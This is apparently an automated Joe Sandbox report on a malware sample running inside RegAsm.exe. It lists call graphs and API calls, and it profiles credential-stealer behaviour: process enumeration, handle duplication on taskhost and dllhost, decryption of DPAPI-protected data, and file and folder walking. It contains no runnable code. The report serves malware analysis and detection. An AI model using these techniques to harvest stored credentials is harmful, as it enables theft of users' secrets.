40349->40353 40351 43759f 40354 416935 16 API calls 40351->40354 40356 416935 16 API calls 40352->40356 40410 444283 13 API calls 40353->40410 40354->40358 40356->40330 40358->40335 40408 42453e 122 API calls 40358->40408 40359 437612 memcpy 40359->40330 40360->40333 40361->40277 40362->40295 40363->40294 40364->40295 40365->40277 40366->40302 40367->40312 40368->40308 40369->40302 40370->40302 40372 41bc3b 100 API calls 40371->40372 40373 41f1b4 40372->40373 40374 41edad 85 API calls 40373->40374 40381 41f282 40373->40381 40375 41f1cb 40374->40375 40376 41f1f5 memcmp 40375->40376 40377 41f20e 40375->40377 40375->40381 40376->40377 40378 41f21b memcmp 40377->40378 40377->40381 40379 41f326 40378->40379 40382 41f23d 40378->40382 40380 41ee6b 85 API calls 40379->40380 40379->40381 40380->40381 40381->40321 40382->40379 40383 41f28e memcmp 40382->40383 40385 41c8df 55 API calls 40382->40385 40383->40379 40384 41f2a9 40383->40384 40384->40379 40387 41f308 40384->40387 40388 41f2d8 40384->40388 40386 41f269 40385->40386 40386->40379 40389 41f287 40386->40389 40390 41f27a 40386->40390 40387->40379 40394 4446ce 11 API calls 40387->40394 40391 41ee6b 85 API calls 40388->40391 40389->40383 40392 41ee6b 85 API calls 40390->40392 40393 41f2e0 40391->40393 40392->40381 40395 41b1ca memset 40393->40395 40394->40379 40395->40381 40396->40321 40397->40321 40398->40321 40399->40315 40400->40316 40401->40330 40402->40333 40403->40333 40404->40333 40405->40333 40406->40333 40407->40351 40408->40335 40409->40349 40410->40359 40411 41493c EnumResourceNamesW 37721 4287c1 37722 4287d2 37721->37722 37723 429ac1 37721->37723 37724 428818 37722->37724 37725 42881f 37722->37725 37739 425711 37722->37739 37735 425ad6 37723->37735 37791 415c56 11 API calls 37723->37791 37758 42013a 37724->37758 37786 420244 96 API calls 37725->37786 37729 4260dd 37785 424251 119 API calls 37729->37785 37733 4259da 37784 416760 11 API calls 37733->37784 37736 429a4d 37742 429a66 37736->37742 37743 429a9b 37736->37743 37739->37723 37739->37733 37739->37736 37740 422aeb memset memcpy memcpy 37739->37740 37745 4260a1 37739->37745 37754 4259c2 37739->37754 37757 425a38 37739->37757 37774 4227f0 memset memcpy 37739->37774 37775 422b84 15 API calls 37739->37775 37776 422b5d memset memcpy memcpy 37739->37776 37777 422640 13 API calls 37739->37777 37779 4241fc 11 API calls 37739->37779 37780 42413a 89 API calls 37739->37780 37740->37739 37787 415c56 11 API calls 37742->37787 37744 429a96 37743->37744 37789 416760 11 API calls 37743->37789 37790 424251 119 API calls 37744->37790 37783 415c56 11 API calls 37745->37783 37747 429a7a 37788 416760 11 API calls 37747->37788 37754->37735 37778 415c56 11 API calls 37754->37778 37757->37754 37781 422640 13 API calls 37757->37781 37782 4226e0 12 API calls 37757->37782 37759 42014c 37758->37759 37762 420151 37758->37762 37801 41e466 96 API calls 37759->37801 37761 420162 37761->37739 37762->37761 37763 4201b3 37762->37763 37764 420229 37762->37764 37765 4201b8 37763->37765 37766 4201dc 37763->37766 37764->37761 37767 41fd5e 85 API calls 37764->37767 37792 41fbdb 37765->37792 37766->37761 37771 4201ff 37766->37771 37798 41fc4c 37766->37798 37767->37761 37771->37761 37773 42013a 96 API calls 37771->37773 37773->37761 37774->37739 37775->37739 37776->37739 37777->37739 37778->37733 37779->37739 37780->37739 37781->37757 37782->37757 37783->37733 37784->37729 37785->37735 37786->37739 37787->37747 37788->37744 37789->37744 37790->37723 37791->37733 37793 41fbf8 37792->37793 37796 41fbf1 37792->37796 37806 41ee26 37793->37806 37797 41fc39 37796->37797 37816 4446ce 11 API calls 37796->37816 37797->37761 37802 41fd5e 37797->37802 37799 41ee6b 85 API calls 37798->37799 37800 41fc5d 37799->37800 37800->37766 37801->37762 37803 41fd65 37802->37803 37804 41fdab 37803->37804 37805 41fbdb 85 API calls 37803->37805 37804->37761 37805->37803 37807 41ee41 37806->37807 37808 41ee32 37806->37808 37817 41edad 37807->37817 37820 4446ce 11 API calls 37808->37820 37812 41ee3c 37812->37796 37814 41ee58 37814->37812 37822 41ee6b 37814->37822 37816->37797 37826 41be52 37817->37826 37820->37812 37821 41eb85 11 API calls 37821->37814 37823 41ee70 37822->37823 37824 41ee78 37822->37824 37879 41bf99 85 API calls 37823->37879 37824->37812 37827 41be6f 37826->37827 37828 41be5f 37826->37828 37833 41be8c 37827->37833 37858 418c63 memset memset 37827->37858 37857 4446ce 11 API calls 37828->37857 37830 41be69 37830->37812 37830->37821 37833->37830 37834 41bf3a 37833->37834 37835 41bed1 37833->37835 37838 41bee7 37833->37838 37861 4446ce 11 API calls 37834->37861 37837 41bef0 37835->37837 37840 41bee2 37835->37840 37837->37838 37839 41bf01 37837->37839 37838->37830 37862 41a453 85 API calls 37838->37862 37841 41bf24 memset 37839->37841 37843 41bf14 37839->37843 37859 418a6d memset memcpy memset 37839->37859 37847 41ac13 37840->37847 37841->37830 37860 41a223 memset memcpy memset 37843->37860 37846 41bf20 37846->37841 37848 41ac52 37847->37848 37849 41ac3f memset 37847->37849 37852 41ac6a 37848->37852 37863 41dc14 19 API calls 37848->37863 37850 41acd9 37849->37850 37850->37838 37854 41aca1 37852->37854 37864 41519d 37852->37864 37854->37850 37855 41acc0 memset 37854->37855 37856 41accd memcpy 37854->37856 37855->37850 37856->37850 37857->37830 37858->37833 37859->37843 37860->37846 37861->37838 37863->37852 37867 4175ed 37864->37867 37875 417570 SetFilePointer 37867->37875 37870 41760a ReadFile 37872 417637 37870->37872 37873 417627 GetLastError 37870->37873 37871 4151b3 37871->37854 37872->37871 37874 41763e memset 37872->37874 37873->37871 37874->37871 37876 4175b2 37875->37876 37877 41759c GetLastError 37875->37877 37876->37870 37876->37871 37877->37876 37878 4175a8 GetLastError 37877->37878 37878->37876 37879->37824 37880 417bc5 37882 417c61 37880->37882 37886 417bda 37880->37886 37881 417bf6 UnmapViewOfFile CloseHandle 37881->37881 37881->37886 37884 417c2c 37884->37886 37892 41851e 18 API calls 37884->37892 37886->37881 37886->37882 37886->37884 37887 4175b7 37886->37887 37888 4175d6 CloseHandle 37887->37888 37889 4175c8 37888->37889 37890 4175df 37888->37890 37889->37890 37891 4175ce Sleep 37889->37891 37890->37886 37891->37888 37892->37884 39914 4147f3 39917 414561 39914->39917 39916 414813 39918 41456d 39917->39918 39919 41457f GetPrivateProfileIntW 39917->39919 39922 4143f1 memset _itow WritePrivateProfileStringW 39918->39922 39919->39916 39921 41457a 39921->39916 39922->39921

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                • API String ID: 2018390131-3398334509
                                                                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                • API String ID: 3957639419-1740548384
                                                                                                                                                                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                • String ID: BIN
                                                                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                • free.MSVCRT ref: 00418803
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1355100292-0
                                                                                                                                                                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1945712969-0
                                                                                                                                                                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
